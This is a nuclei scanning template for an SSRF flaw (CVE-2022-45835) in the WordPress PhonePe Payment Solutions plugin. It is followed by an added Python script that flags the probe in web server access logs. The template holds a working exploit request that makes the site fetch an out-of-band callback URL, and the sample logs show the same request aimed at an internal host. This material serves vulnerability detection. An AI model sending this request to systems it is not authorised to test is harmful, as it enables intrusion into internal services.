nuclei-templates/cves/2022/CVE-2022-45835.yaml

id: CVE-2022-45835

info:
  name: WordPress PhonePe Payment Solutions Plugin <= 1.0.15 - Server Side Request Forgery (SSRF)
  author: theamanrawat
  severity: high
  description: |
    Server Side Request Forgery (SSRF) vulnerability in the WordPress PhonePe Payment Solutions plugin. This could allow a malicious actor to make the website issue HTTP requests to an arbitrary domain controlled by the attacker, and thereby discover sensitive information about other services running on the system.
  remediation: Fixed in version 2.0.0
  reference:
    - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf
    - https://wordpress.org/plugins/phonepe-payment-solutions/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-45835
  metadata:
    verified: "true"
  tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe

requests:
  - raw:
      - |
        GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "cURL Test for PhonePe"

      - type: status
        status:
          - 200
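Added example, not part of this template or the nuclei project: a small Python check that scans web server access logs for requests matching the probe above (the `curltestPhonePe` action carrying an outbound `url`), so a site owner can see whether the endpoint was exercised before patching. It assumes combined-format access logs and takes an allow-list of hosts the plugin legitimately contacts, which the template does not name, so it defaults to flagging every destination.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
# Line 1 mirrors the probe this template sends (an OAST callback host); line 3 is the
# same action aimed at an internal hostname; line 2 is unrelated noise.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2023:10:01:02 +0000] "GET /?phonepe_action=curltestPhonePe&url=http://abcd1234.oast.example HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2023:10:01:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2023:10:01:09 +0000] "GET /?phonepe_action=curltestPhonePe&url=http%3A%2F%2Fintranet.example.internal%2F HTTP/1.1" 200 512 "-" "curl/7.81.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_ssrf_probes(log_text, allowed_hosts=frozenset()):
    """Return one finding per request that invokes the plugin's cURL-test action
    (phonepe_action=curltestPhonePe) with a `url` whose host is not allow-listed.

    `allowed_hosts` is an assumption: the hosts the plugin legitimately contacts
    are not known from the template, so the default flags every destination.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than crash on them
        qs = parse_qs(urlsplit(m["target"]).query)  # parse_qs also percent-decodes values
        if "curltestPhonePe" not in qs.get("phonepe_action", []):
            continue
        for url in qs.get("url", []):
            host = (urlsplit(url).hostname or "").lower()
            if host in allowed_hosts:
                continue
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "target_host": host,
                "url": url,
            })
    return findings

if __name__ == "__main__":
    for f in find_ssrf_probes(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} -> {f['target_host']} (HTTP {f['status']})")
```

A 200 response on such a request is consistent with the template's own success matcher; findings that predate the upgrade to 2.0.0 are worth correlating with outbound connection logs from the web host.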